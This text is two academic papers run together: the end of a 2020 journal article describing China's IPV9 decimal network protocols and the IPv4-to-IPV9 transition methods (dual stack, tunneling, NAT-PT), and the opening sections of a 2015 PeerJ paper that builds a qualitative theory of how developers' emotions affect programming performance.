According to the IPV9 header protocol, IPV9 header adopts the form of basic header + extended header chain. Compared to THE IPv4 header, the IPV9 header has removed the header length field and replaced the Type of Service field with the Traffic Class field. The Protocol Type and time-to-live (TTL) fields have been renamed and slightly modified. In addition, the Flow Label field has been added. Although the total length of the IPV9 base header is nearly four times that of the default IPv4 header (20 bytes), to 72 bytes, it is actually simplified. Because the vast majority of the header is occupied by two 64-byte IPV9 addresses, the rest of the header takes up only eight bytes. B. IPV9 Address Protocol The IPV9 address protocol specifies that the IPV9 address is 256 bits, enabling a large addressing space of 2256. According to the data transmission mode, it can be divided into unicast, on-demand and multicast. In addition, the addressing model of IPV9, text representation of IPV9 address, text representation of address prefix, address type representation, monocular address, multiple destinations address and other contents are also specified. ● IPV9 addressing model: Specifies that all types of IPV9 addresses are assigned to interfaces, not nodes. ● Textual representation of 1PV9 addresses: Specifies that IPV9 addresses use "bracket decimal" notation. IPV9 addresses can be divided into pure IPV9 addresses, IPv4-compatible IPV9 addresses, ipV6-compatible IPV9 addresses, special compatible addresses, full decimal addresses, and transitional IPV9 addresses. For convenience of reading, some abbreviations are specified for text representation of addresses. ● Textual representation of address prefixes: Address prefixes for IPV9 addresses are specified to reflect the network hierarchy. ● Address type representation: Specifies some of the high boot bits of the IPV9 address as the format prefix FP to indicate different types of IPV9 addresses. The length of these format prefixes varies. ● Monocular address: Represents a single network interface. Messages addressed to monocular address will be sent to the unique network interface identified by it. The forms of monocular addresses specified in the IPV9 address protocol include the aggregated global monocular address, the decimal Internet address, the domain name decision and assignment organization address, the IPX address, the local IPV9 monocular address, and the IPv4 compatible address. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 37 ● Multiple destinations address: A class of IPV9 addresses assigned to multiple network interfaces at the same time. The IPV9 address protocol states that multiple destinations address addresses are assigned from single-mesh addresses, using the same format as single-mesh addresses. When a monocular address is assigned to multiple network interfaces, it is functionally converted to a multiple destinations address. C. IPV9 Interim Agreement The IPV9 transition protocol specifies the header format of the IPV9 transition and the definition of the address text representation, addressing model, and node address, including a detailed description of the current transition header and address format defined. The transitional headers used the original IPv4 header, only changing the version number to 9 to distinguish it from the original IPv4 header. The transitional address adopts the latter two segments of the IPV9 address, a total of 64 bits. IV. TECHNICAL FEATURES OF IPV9 DECIMAL NETWORK A. Address space The wealth of IP address resources is undoubtedly an important advantage of the IPV9 decimal network. Due to the 256-bit address, the theoretical address capacity is 2256, which is said to be able to assign a permanent address to the world's human needs for 750 years, and can be automatically increased sequentially after 750 years. So the address is large enough to solve the IPv4 address resource constraints. B. Digital domain name System Digital domain name is an important part of IPV9 decimal network system, which is compatible with English domain name and Chinese domain name. It is impossible to replace English domain names, but it is a good choice for users who are not used to English domain names. In addition, due to digital domain name technology, the decimal network system can be the domain name, IP address, MAC address unified representation into decimal text. C. Automatic configuration According to IPV9 plug and play data, IPV9 supports stateless and stately host address automatic configuration, which USES DHCP of IPV9. D. Security The special encryption mechanism is adopted to ensure the safe transmission of network data. E. Mobility support The IPV9 decimal network establishes an IPV9 tunnel between the mobile unit and the home agent, and then relays the packets to the mobile unit's home address received by the "proxy" of the mobile unit through the tunnel to the current location of the mobile unit, so as to realize the support for network terminal mobility. IPV9 decimal network introduced the digital domain name technology, convenient digital button Internet, simplified the difficulty of network management. The expansion of address space and the introduction of security mechanisms have solved the problems faced by IPv4 networks. Support for QoS, automatic configuration, and mobility enables it to better meet multiple business requirements. IPV9 protocol can theoretically meet the requirements of the new generation of Internet development. At present, after the experimental verification stage, completed the development of basic hardware equipment, has entered the stage of small-scale application. V. TRANSITION TECHNOLOGY FROM IPV4 TO IPV9 Although IPV9 has many technical features and can solve various problems faced by IPv4, IPV9 has a long history. The IPV9 decimal network is not likely to replace the huge IPv4 network in a short time, but will go through a long process of coexistence and transition. Drawing on a number of IPv6 technologies, lPv9 also International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 38 supports the IETF Next Generation Internet Transition Working Group to propose dual stack, tunneling technology, and NAT-PT (Network address translation/protocol translation). A. Dual protocol stack technology This is the simplest way to handle transition problems. This mechanism enables the device to handle both types of protocols by running both 1PV9 and IPv4 stacks on a single device, as shown in Table 2. TABLE II. STRUCTURE DIAGRAM OF DOUBLE PROTOCOL STACK The application layer Transport Layer (TCP/UDP protocol) IPv4 IPV9 Network interface layer The dual stack mechanism is intuitive and easy to understand. The problem is that the dual stack still requires the corresponding host to configure IPv4 addresses, otherwise it is invalid, which goes against the original intention of using IPV9 to solve the problem of insufficient IPv4 addresses. In practice, it is impossible for all hosts or terminals to upgrade to support dual stacks, and using dual stacks will increase the burden on hosts and reduce performance. Therefore, the application must be combined with other technologies. B. Tunneling Technology Tunneling provides a way to pass IPV9 data over existing IPv4 routing systems, as shown in Figure 3. The technical principle is that at the entrance of the tunnel, the router encapsulates the 1PV9 data packet into the IPv4 packet, whose source address and destination address are the IPv4 addresses of the tunnel entrance and exit respectively. The encapsulated IPv4 packet will be transmitted through the IPv4 routing body, and the protocol domain of the packet header is set to 141. Indicates that the load of this packet is an IPV9 packet, which is taken out and forwarded to the destination station at the exit of the tunnel. IPV9 Network IPV9 Network IPv4 Public Networks R1 R2 Tunnel Port Tunnel Port Figure 1. IPV9 over IPv4 tunnels Tunneling technology requires modifications only at the entrance and exit of the tunnel, with no other requirements, and is therefore very easy to implement. It is currently the most widely used transition technology, the disadvantage is that IPV9 host and IPv4 host cannot achieve direct communication. Transitional IPV9 decimal network supports two tunnel technologies: IPV9 over IPv4 and IPv4 over IPV9, which can be divided into automatic configuration and manual configuration according to address configuration. The improved technology includes tunnel agent technology. C. NAT - PT Nat-PT technology is a protocol translation technology that performs both header and semantic translation (PT) between IPv4 and IPV9 packets while performing IPv4/IPV9 address translation (NAT). Through the introduction of Nat-PT router, the intercommunication between IPv4 sub-net and IPV9 sub-net can be realized. The network structure is shown in Figure 2. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 39 IPV9 Network IPv4 Network NAT-PT Router Figure 2. Nat-PT network structure diagram Nat-PT can solve the problem of tunnel technology and realize direct communication between IPV9 and IPv4 host, which is suitable for the initial stage of the transition of IPV9 network with small scale. VI. CONCLUSION The decimal network is based on the digital domain name and IPV9, two core technologies independently developed in China, with independent intellectual property rights. At the same time, it can solve various problems faced by the existing IPv4 network and meet the requirements of the development of the next generation of Internet. If it can be applied and popularized, it will promote the great development of the Internet and help China get rid of the situation of being restrained by others in Internet technology. However, the establishment and promotion of standards is not a simple technical issue, which involves the interests of various countries and groups. Therefore, the popularization of decimal network cannot be accomplished overnight, so it should be supported by the state and applied in government departments, military departments and other departments with higher requirements on network performance and security. And then gradually spread to achieve business operations. At the same time, it is also necessary to coordinate the relationship between domestic and foreign interest groups and promote their international standardization process, so as to finally achieve the goal of completely replacing the existing IPv4 network. REFERENCE [1] Xie Jianping, HUANG Changfu. Current Situation and Development of Decimal Network [J]. Information Technology and Standardization,2004(04):5-9. [2] Huang Changfu. Interpretation of Digital Domain Name Specification [J]. Information Technology and Standardization,2006(09):34-36. [3] Zhang Yunghui, Jiang Xinhua, Lin Zhangxi. Comparison between IPv6 and IPv9 [J]. Computer Engineering,2006(04):116-118. [4] Farinacci D., Fuller V., Meyer D., Lewis D. Interworking LISP with IPv4 and IPv6”, draft-ietf- lisp-interworking-01, Aug. 2010. [5] Jung H., & Koh S.J. Mobile Optimized Future Internet”, http://protocol.knu.ac.kr/tech/CPL-TR- 10-01-MOFI-12.pdf, Jun. 2010. work_i2qf3vbj7bampklw365wxgijja ---- How do you feel, developer? An explanatory theory of the impact of affects on programming performance Submitted 10 June 2015 Accepted 27 July 2015 Published 19 August 2015 Corresponding author Daniel Graziotin, daniel.graziotin@unibz.it Academic editor Philipp Leitner Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.18 Copyright 2015 Graziotin et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS How do you feel, developer? An explanatory theory of the impact of affects on programming performance Daniel Graziotin1, Xiaofeng Wang1 and Pekka Abrahamsson2 1 Faculty of Computer Science, Free University of Bozen-Bolzano, Bolzano/Bozen, Italy 2 Department of Computer and Information Science, Norwegian University of Science and Technology, Trondheim, Norway ABSTRACT Affects—emotions and moods—have an impact on cognitive activities and the working performance of individuals. Development tasks are undertaken through cognitive processes, yet software engineering research lacks theory on affects and their impact on software development activities. In this paper, we report on an interpretive study aimed at broadening our understanding of the psychology of programming in terms of the experience of affects while programming, and the impact of affects on programming performance. We conducted a qualitative interpretive study based on: face-to-face open-ended interviews, in-field observations, and e-mail exchanges. This enabled us to construct a novel explanatory theory of the impact of affects on development performance. The theory is explicated using an established taxonomy framework. The proposed theory builds upon the concepts of events, affects, attractors, focus, goals, and performance. Theoretical and practical implications are given. Subjects Human–Computer Interaction, Social Computing, Software Engineering Keywords Affects, Emotions, Productivity, Moods, Psychology of programming, Human aspects of software engineering, Process theory, Performance, Interpretivism, Theory building INTRODUCTION It has been established that software development is intellectual, and it is carried out through cognitive processes (Feldt et al., 2010; Feldt et al., 2008; Khan, Brinkman & Hierons, 2010; Lenberg, Feldt & Wallgren, 2014; Lenberg, Feldt & Wallgren, 2015). Software development happens in our minds first, then on artifacts (Fischer, 1987). We are human beings, and, as such, we behave based on affects as we encounter the world through them (Ciborra, 2002). Affects—which for us are emotions and moods1 —are the medium within which acting towards the world takes place (Ciborra, 2002). The affects pervade organizations because they influence worker’s thoughts and actions (Brief & Weiss, 2002). Affects have a role in the relationships between workers, deadlines, work motivation, sense-making, and human-resource processes 1 For the purposes of this study, we consider affect as an underlying term for emotions and moods, in line with several other authors, e.g., Weiss & Cropanzano (1996); Fisher (2000). See “Affect, emotion, and mood” for more information. How to cite this article Graziotin et al. (2015), How do you feel, developer? An explanatory theory of the impact of affects on programming performance. PeerJ Comput. Sci. 1:e18; DOI 10.7717/peerj-cs.18 mailto:daniel.graziotin@unibz.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.18 http://dx.doi.org/10.7717/peerj-cs.18 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 (Barsade & Gibson, 2007). Although affects have been historically neglected in studies of industrial and organizational psychology (Muchinsky, 2000), an interest in the role of affects on job outcomes has accelerated over the past fifteen years in psychology re- search (Fisher & Ashkanasy, 2000). In particular, the link between affects and work-related achievements, including performance (Barsade & Gibson, 2007; Miner & Glomb, 2010; Shockley et al., 2012) and problem-solving processes, such as creativity (Amabile et al., 2005; Amabile, 1996), has been of interest for recent research. While research is still needed on the impact of affects to cognitive activities and work-related achievements in general, this link undeniably exists according to psychology research. We believe that it is important to understand the role of affects in software development processes and their impact on the performance2 of developers. 2 The stance that performance and productivity are two interchangeable terms is assumed in this study, in line with Fagerholm et al. (2015), Petersen (2011) and Meyer et al. (2014). It has been argued that software engineering has to produce knowledge that matters to practitioners (Osterweil et al., 2008). Indeed, we have shown elsewhere (Graziotin, Wang & Abrahamsson, 2014b) that practitioners are deeply interested in their affects while developing software, which causes them to engage in long and interesting discussions when reading related articles. We share Lenberg, Feldt & Wallgren (2015) view that software engineering should also be studied from a behavioral perspective. We have embraced this view in previous studies—e.g., Graziotin, Wang & Abrahamsson (2014a), Graziotin, Wang & Abrahamsson (2015a) and have employed theories and measurement instruments from psychology to understand how affect impact o software developers’ performance under a quantitative strategy using experiments. However, in order to understand the human behavior behind affects and software development, there is a need to observe software developers in-action and perform interviews. So far, research has not produced qualitative insights on the mechanism behind the impact of affects on the performance of developers. We have called for such studies in the past (Graziotin, Wang & Abrahamsson, 2015a). Moreover, a lack of theory in software engineering has been recently highlighted (Johnson, Ekstedt & Jacobson, 2012). Thus, we conducted a study laying down the theoretical answers to the research question how are developers’ experienced affects related to performance while programming? In this paper, we report an interpretive study of the impact of affects of developers on the software development performance. By deeply observing and open interviewing two developers during a development cycle, we constructed an explanatory theory, called Type II theory by Gregor (2006), for explaining the impact of affects on development performance. The remainder of this paper is structured as follows. In the Background section, we first briefly introduce what we mean with affects. We then review the related studies of affects and the performance of developers. Then, we provide the theoretical framing of this study and the theory representation. The following section summarizes the methodology of this study by explicating our worldview and how we chose among the various options, the research design, the data analysis method, and the reliability procedures. We then report the results of our work, i.e., an explanatory theory of the impact of affects on programming performance, as well as a discussion and comparison with related work. The last section Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 2/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 concludes the paper by providing the contribution and implications of our study, the limitations, and the suggested future work. BACKGROUND In this section, we first briefly introduce what we mean with affects, and we review the papers in the software engineering field, where the affects of software developers have been taken into consideration with respect to performance. Affect, emotion, and mood The fields of psychology have yet to agree on the definitions of affects and the related terms such as emotions, moods, and feelings (Ortony, Clore & Collins, 1990; Russell, 2003). Several definitions for affects, emotions, and moods exist—to the point that Ortony, Clore & Collins (1990) defined the study of affects as a “very confused and confusing field of study” (p. 2). We are aware that some proposals have been established more than others. For example, Plutchik & Kellerman (1980) have defined emotions as the states of mind that are raised by external stimuli and are directed toward the stimulus in the environment by which they are raised. Parkinson et al. (1996) have defined moods as emotional states in which the individual feels good or bad, and either likes or dislikes what is happening around him/her. In other words, mood has been defined as a suffused emotion, where no originating stimulus or a target object can be distinguished (Russell, 2003). The issue with the proposed definitions, including those reported above, is that hundreds of competing definitions have been produced in just a few years (Kleinginna & Kleinginna, 1981) and a consensus has yet to be reached. There are also cultural issues to be considered. For example, emotion as a term is not universally employed, as it does not exist in all languages and cultures (Russell, 1991). Distinctions between emotions and moods are clouded, because both may feel very much the same from the perspective of an individual experiencing either (Beedie, Terry & Lane, 2005). As emotions and moods may feel the same from the perspective of an individual, we have adopted the stance of several researchers in the various fields (Schwarz & Clore, 1983; Schwarz, 1990; Wegge et al., 2006; De Dreu et al., 2011) and employed the noun affects (and affective states) as an underlying term for emotions and moods. We do not neglect moods and emotions per se.3 We opted to understand the states of minds of software developers at 3 The issues of defining the concepts under study is not trivial and it deserves separate discussions. We point the reader to two of our recent articles (Graziotin, Wang & Abrahamsson, 2015c; Graziotin, Wang & Abrahamsson, 2015b), in which we have discussed the theoret- ical foundations, the various theories, and the classification frameworks for affects, emotions, and moods, and the common misconceptions that occur when studying these constructs. the affective level only, that is “one level below” moods and emotions. Our choice was not unthoughtful. We have adhered to the core affect theory (Russell, 2003; Russell & Barrett, 1999; Russell, 2009), which employs affect as the atomic unit upon which moods and emotional experiences can be constructed. That is, in this article we do not distinguish between emotions and moods. We are interested in understanding how developers feel. Related work Lesiuk (2005) studied 56 software engineers in a field study with removed treatment design.4 The aim of the study was to understand the impact of music listening on software 4 Removed treatment designs are part of single-group quasi-experiment designs. A removed treatment design allows one to test hypotheses about an outcome in the presence of the intervention and in the absence of the intervention (Harris et al., 2006). A pre-treatment measure- ment is taken on a desired outcome; a treatment is provided; a post-treatment measurement is conducted; a second post-treatment measurement is conducted; the treatment is removed; a final measurement is performed (Harris et al., 2006). design performance. The study was conducted over a five-week period. The design performance and the affects of the developers were self-assessed twice per day. For the first Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 3/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 week of the study (the baseline), the participants were observed in natural settings—that is, they worked as usual, doing what they do usually. During the second and third week, the participants were allowed to listen to their favorite music while working. However, during the fourth week, listening to music was not allowed. During the fifth week, the participants were allowed again to listen to the music. The results indicated a positive correlation of positive affects and listening to favorite music. Positive affects of the participants and self-assessed performance were lowest with no music, but not statistically significant. On the other hand, narrative responses revealed the value of music listening for positive mood change and enhanced perception on software design performance. Along a similar line, Khan, Brinkman & Hierons (2010) theoretically constructed links from psychology and cognitive science studies to software development studies. In this construction, programming tasks were linked to cognitive tasks, and cognitive tasks were linked to affects. For example, the process of constructing a program—e.g., modeling and implementation—was mapped to the cognitive tasks of memory, reasoning, and induc- tion. Khan, Brinkman & Hierons (2010) conducted two studies to understand the impact of affects on the debugging performance of developers. In the first study, positive affects were induced to the software developers. Subsequently, the developers completed a quiz about software debugging. In the second study, the participants wrote traces of the execution of algorithms on paper. During the task, the affect arousal was induced to the participants. Overall, the results of the two studies provided empirical evidence for a positive correlation between the affects of software developers and their debugging performance. We also conducted two studies to understand the connection between affects and the performance of software developers. In the first study (Graziotin, Wang & Abrahamsson, 2014a), we recruited 42 computer science students to investigate the relationship between the affects of software developers and their performance in terms of creativity and analytic problem-solving. In a natural experiment, the participants performed two tasks chosen from psychology research that could be transposed to development activities. The partici- pants’ pre-existing affects were measured before each task. Overall, the results showed that the happiest developers are better problem solvers in terms of their analytic abilities. The second study (Graziotin, Wang & Abrahamsson, 2015a) was a correlation study of real-time affects and the self-assessed productivity of eight software developers while they were performing a 90 min programming task on a real-world project. The developers’ affects and their productivity were measured in intervals of 10 min. Through the fit of a linear mixed effects model, we found evidence for a positive correlation between the affects of developers associated to a programming task and their self-assessed productivity. In this study, we called for process-based studies on software teams which “are required in order to understand the dynamics of affects and the creative performance of software teams and organizations” (p. 17). Müller & Fritz (2015) performed a study with 17 participants, 6 of which were profes- sional software developers and 11 were PhD students in computer science. The participants were asked to perform two change tasks, one for retrieving StackOverflow scores and the other to let users undo more than one command in the JHotDraw program. During the Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 4/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 development, the participants were observed using three biometric sensors, namely an eye tracker, an electroencephalogram, and a wearable wireless multi-sensor for physiological signals (e.g., heart rate, temperature, skin conductance). After watching a relaxing video, the participants worked on both tasks in a randomly assigned order. They were then interrupted after 5 min of working or when they showed strong signs of emotions. During each interruption, the participants rated their affects using a psychology measurement instrument. After other 30 min of work, the participants repeated the experiment design using the second task. Finally, the participants were interviewed. Overall, the study found that (1) developers feel a broad range of affects, expressed using the two dimensional measures of valence and arousal instead of labeling the affects, (2) the affects expressed as valence and arousal dimensions are correlated with the perceived progress in the task (evaluated using a 1–5 Likert scale), (3) the most important aspects that affect positive emotions and progress are the ability to locate and understand relevant code parts, and the mere act of writing code instead of doing nothing. On the other hand, most negative affects and stuck situations were raised by not having clear goals and by being distracted. So far, the literature review has shown that the number of studies regarding the affects and the performance of developers is limited. Furthermore, the studies are all quantitative and toward variance theory. Variance theories, as opposed to process theories, provide explanations for phenomena in terms of relationships among dependent and independent variables (Langley, 1999; Mohr, 1982). In variance theory, the precursor is both a necessary and sufficient condition to explain an outcome, and the time ordering among the independent variables is immaterial (Pfeffer, 1983; Mohr, 1982). Strictly speaking, variance theory studies are hypothesis-driven studies, which aim to quantify the relationship between two variables in their base case. Process research is concerned with understanding how things evolve over time and why they evolve in they way we observe (Langley, 1999). According to Langley (1999), process data consist mainly of “stories”—which are implemented using several different strategies—about what happened during observation of events, activities, choice, and people performing them, over time. Mohr (1982) has contrasted process theory from variance theory by stating that the basis of explanation of things is a probabilistic rearrangement instead of clear causality, and the precursor in process theory is only a necessary condition for the outcome. In the literature review, a lack of theoretical and process-based studies was identified. For this reason, we aimed at developing a process-based theory. Theoretical framework Our theoretical framework was primarily based upon the Affective Events Theory (AET) by Weiss & Cropanzano (1996) and the episodic process model of performance episodes by Beal et al. (2005). AET has been developed as a high-level structure to guide research on how affects influence job satisfaction and job-related performance. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 5/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 In AET, the work environment settings (e.g., the workplace, the salary, promotion opportunities, etc.) mediate work events that cause affective reactions, which are interpreted according to the individuals’ disposition. Affective reactions then influence work-related behaviors. Work-related behaviors are divided into affect-driven behaviors and judgment-driven behaviors. Affect-driven behaviors are behaviors, decisions, and judgments that have immediate consequences of being in particular emotions and moods. One example could be overreacting to a criticism. Judgment-driven behaviors are driven by the more enduring work attitudes about the job and the organization (Weiss & Beal, 2005). Examples are absenteeism and leaving. As Weiss & Beal (2005) noted ten years after publishing AET, AET has often been erroneously employed as a theoretical model to explain affective experiences at work. However, AET is a macrostructure for understanding affects, job satisfaction in the workplace, and to guide future research on what are their causes, consequences, and explanations. More specifically, AET is not a framework to explain the performance on the job, neither is it a model to explain the impact of all affects on job-related behaviors. In their conceptual paper, Beal et al. (2005) provided a model that links the experiencing of affects to individual performance. Beal et al. (2005) model is centered around the conceptualization of performance episodes, which relies on self-regulation of attention regarding the on-task focus and the off-task focus. The cognitive resources towards the focus switch is limited. Affects, according to Beal et al. (2005), hinder the on-task performance regardless of them being positive or negative. The reason is that affective experiences create cognitive demand. Therefore, affective experiences, according to this model, influence the resource allocation towards off-task demand. Theory construction and representation Interpretive research is often conducted when producing theories for explaining phe- nomena (Klein & Myers, 1999). Gregor (2006) examined the structural nature of theories in information systems research. Gregor proposed a taxonomy to classify theories with respect to how they address the four central goals of analysis and description, explanation, prediction, and prescription. We employed the widely established Gregor (2006) work as a framework for classifying and expressing our proposed theory. A Type II—or explanation—theory provides explanations but does not aim to predict with any precision. The structural components of a Type II theory are (1) the means of representation—e.g., words, diagrams, graphics, (2) the constructs—i.e., the phenomena of interests, (3) the statements of relationships—i.e., showing the relationships between the constructs, (4) the scope—the degree of generality of the statements of relationships (e.g., some, many, all, never) and statements of boundaries, and (5) the causal explanations which are usually included in the statements of relationship. While conducting this study, we ensured the constructed theory was composed of these elements. Our study attempts to broaden our understanding of topics that are novel and unexplored in our field. Rindova (2008) warned us that “novelty, however, comes at a cost: novel things are harder to understand and, especially, to appreciate” (p. 300). Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 6/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Therefore, we have to proceed carefully in the theory building process. The risk is to get lost in complex interrelated constructs in a confused and confusing field of study (Ortony, Clore & Collins, 1990) brought in the complicated, creative domain that is software engineering. Furthermore, Barsade & Gibson (1998) advised researchers that, when understanding emotion dynamics, the bigger is the team under observation, the more complex and complicated are the team dynamics. Bigger teams have complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (Barsade & Gibson, 1998). Therefore, there is the need to keep the phenomenon under study as simple as possible. For novel theory development, philosophers and economists often—but not always—draw from their own personal observation and reasoning, while still being able to offer a sound empirical basis (Yeager, 2011). Theorizing from the ivory tower can complement the scientific method by offering insights and discovering necessary truths (Yeager, 2011), to be further expanded by empirical research. Our empirical stance makes us eager to jump to data and start theorizing; yet, we need to take some precautionary measures before doing this. When novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (Järvinen, 2012). A small sample enables the develop- ment of an in-depth understanding of the new phenomena under study (Järvinen, 2012) and to avoid isolation in the ivory tower. Our research follows carefully Järvinen (2012) recommendations, which is reflected in our study design. Weick (1995) classic article is of the same stance by reporting that organizational study theories are approximations of complex interrelated constructs of human nature that often have small samples. Those works are often seen as substitutes of theory studies, but they often represent “struggles in which people intentionally inch toward stronger theories” (ibid, p. 1). Such struggles are needed when a phenomenon is too complex to be captured in detail (Weick, 1995). These issues were taken into account when we designed our study, which is demonstrated in the following section. METHODOLOGY We describe our research as a qualitative interpretive study, which was based on face-to- face open-ended interviews, in-field observations, and e-mail exchanges. Given the aim of the study, there was the need to make sense of the developers’ perceptions, experiences, interpretations, and feelings. We wanted to conduct open-ended interviews where the realities constructed by the participants are analyzed and reconstructed by the researcher. Our epistemological stance for understanding these social constructs and interactions has been interpretivism, which we make coincide with social constructivism in line with other authors (Easterbrook et al., 2008). Interpretive data analysis has been defined succinctly by Geertz (1973) as “really our own constructions of other people’s constructions of what they and their compatriots are up to” (p. 9). Interpretivism is now established in information systems research (Walsham, 2006), but we see it still emerging in software engineering research. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 7/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Design As per our chosen design, the participants could be free to undergo the development of the system in any way, method, practice, and process they wished to employ. Our study comprised of regular scheduled face-to-face meetings with recorded interviews, impromptu meetings which could be called for by the participants themselves, e-mail exchanges, in-field observations, and a very short questionnaire right after each commit in the git system (explained in section Reliability). Therefore, the participants had to be aware of the design itself, although they were not informed about the aims of the study. The participants’ native language is Italian, but they have been certified as proficient English speakers. The first author of the present article employs Italian as first language as well, and he was the reference person for the participants for the duration of the entire study. The other two authors of the present article have been certified as proficient and upper intermediate in Italian. The choice for the design of the study was therefore to conduct the interviews in Italian, as the native language let the participants express their opinion and feelings in the richest, unfiltered way (Van Nes et al., 2010). The interviews were subsequently transcribed in English as suggested by the common research practices (Van Nes et al., 2010; Squires, 2009), but the present case had the added value that the authors could validate the transcripts with the participants over the course of the study, given their advanced proficiency in English. The in-field observations were performed by two of the present authors, and the personal communications such as e-mails or some impromptu meetings were exchanged between the first author of the study and the participants. The coding activities have been a collaborative effort among all the authors of this study. In order to keep the study design and results as simple as possible and to provide precise answers to the research question, in line with what we stated in the section Theory Construction and Representation, we observed activities that produced code. Other artifacts such as requirements and design were not taken into consideration. Furthermore, our strategy to limit the complex network of triggered affects was to group and study them into the two well-known dimensions of positive and negative affects (Watson, Clark & Tellegen, 1988), which assign the affects—including those perceived as neutral—in a continuum within the two dimensions. Our design took into account ethical issues, starting with a written consent to be obtained before starting any research activity. The consent form informed the participants of our study in terms of our presence, activities, data recordings, anonymity and data protection, and that their voluntary participation could be interrupted at any time without consequences. They were also informed that any report of the study had to be approved by them in terms of their privacy, dignity protection, and data reliability before it was disclosed to any third party. Furthermore, as an extra measure, any additional, personal data coming from e-mail exchanges and some impromptu meetings with a single author was approved by the participants before inclusion to the study data. Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 8/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Data analysis Grounded theory has been indicated to study human behavior (Easterbrook et al., 2008), and it is suitable when the research has an explanatory and process-oriented focus (Eisenhardt, 1989). Qualitative data analysis techniques from grounded theory responded to our needs (Langley, 1999). We are aware that there has been some heated debate regarding which, between Glaser & Strauss (1967) or Corbin & Strauss (2008), is the grounded theory qualitative strategy (Creswell, 2009) or if it can be employed merely as a tool to analyze qualitative data (Kasurinen, Laine & Smolander, 2013). Heath & Cowley (2004) comparison study concludes that researchers should stop debating about grounded theory, select the method that best suits their cognitive style, and start doing research. We agree with them and adopted Charmaz (2006) social constructivist grounded theory approach as a tool to analyze qualitative data coming from face-to-face open-ended interviews, in-field observations, and e-mail exchanges. The adaption of grounded theory by Charmaz (2006) has merged and unified the major coding techniques into four major phases of coding, which are initial coding, focused coding, axial coding, and theoretical coding. The four coding phases have been adopted in the data analysis process of this study. Charmaz (2006) has often remembered her readers that no author on grounded theory methodology has ever really offered criteria for establishing what we should accept as a coding family, and that the coding phases are often overlapping, iterative and not strictly sequential within each iteration. This is true also for this study. An exemplar case of our coding activities is shown in Fig. 1. The figure is divided into four columns. The first column provides an interview excerpt. The remaining columns show the intermediate results of the coding activities. The initial coding phase should stick closely to the data instead of interpreting the data. The researchers should try to see the actions in each segment of data, and to avoid applying pre-existing categories to it. Therefore, Charmaz (2006) has suggested to code the data on a line-by-line approach so that the context is isolated as much as possible, and to code the data as actions. In order to help focusing on the data as actions, it has been suggested to use gerunds. For example, in Fig. 1 the second column shows the initial codes assigned to a interview snippet. The second coding phase is the focused coding. Focused code means that the most significant or frequent (or both) codes which appeared in the initial coding are employed to sift through larger amounts of data, like paragraphs, speeches, and incidents. This phase is about deciding which initial codes make the most analytic sense for categorizing the data. However, it is also possible to create umbrella codes as substitutes for other codes. During focused coding, the codes become more directed, selective, and conceptual. For example, as shown in Fig. 1, the initial code “Improving productivity through the use of ST” was further abstracted as “Improving productivity through a tool.” The third coding phase is the axial coding. The axial coding phase has been proposed by Strauss & Corbin (1994). As synthesized by Charmaz (2006), the axial coding process follows the development of major categories, relates categories to subcategories, and relates them with each others. If during initial and focused coding the data is fractured into pieces, Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 9/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 Figure 1 Example of coding phases for this study. the axial coding phase brings the data back together again. In this phase, the properties and the dimensions of a category are specified. The fourth column of Fig. 1 shows an iteration of axial coding. The fourth coding phase is the theoretical coding. Theoretical coding was introduced by Glaser (1978). As synthesized by Charmaz (2006), the theoretical coding phase specifies how the codes from the previous phases related to each other as hypotheses to be integrated into a theory. It would be impractical to show the steps and complete examples of axial and theoretical coding as they would need several interview excerpts and resulting codes (Charmaz, 2006). What we could demonstrate in Fig. 1 was that the interview excerpt was further coded in the later coding phases and became part of the evidence to support the key concepts, such as affect, and their components as shown in the fourth column. The overlapping of different categories over the same snippets indicated the potential linkage among them, which became the basis to develop the model proposed in this study. Reliability Here, we describe our procedures for enhancing the reliability of the gathered data and the results. The data was gathered using multiple sources. Each interview was accompanied by handwritten notes, recordings, and related subsequent transcriptions. All in-field observations were accompanied by audio recordings after obtaining permission of the Graziotin et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.18 10/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.18 participants. We wrote memos during the study. The transcriptions and the coding phases were conducted using Atlas.ti 7.5, which is a recognized instrument for such tasks. In order to make the participants focus on their affects and recall how they felt during performance episodes, we asked them to fill out a very short questionnaire at each git commit. The questionnaire was the Self-Assessment Manikin (Bradley & Lang, 1994), which is a validated pictorial questionnaire to assess affects. We employed the questionnaire in a previous study (Graziotin, Wang & Abrahamsson, 2015a) as it proved to be quick (three mouse clicks for completing one) and not invasive. We employed the gathered data to triangulate the observational data and the interview data during each interview. If there was disagreement between the qualitative data (e.g., several positive affective episodes but negative 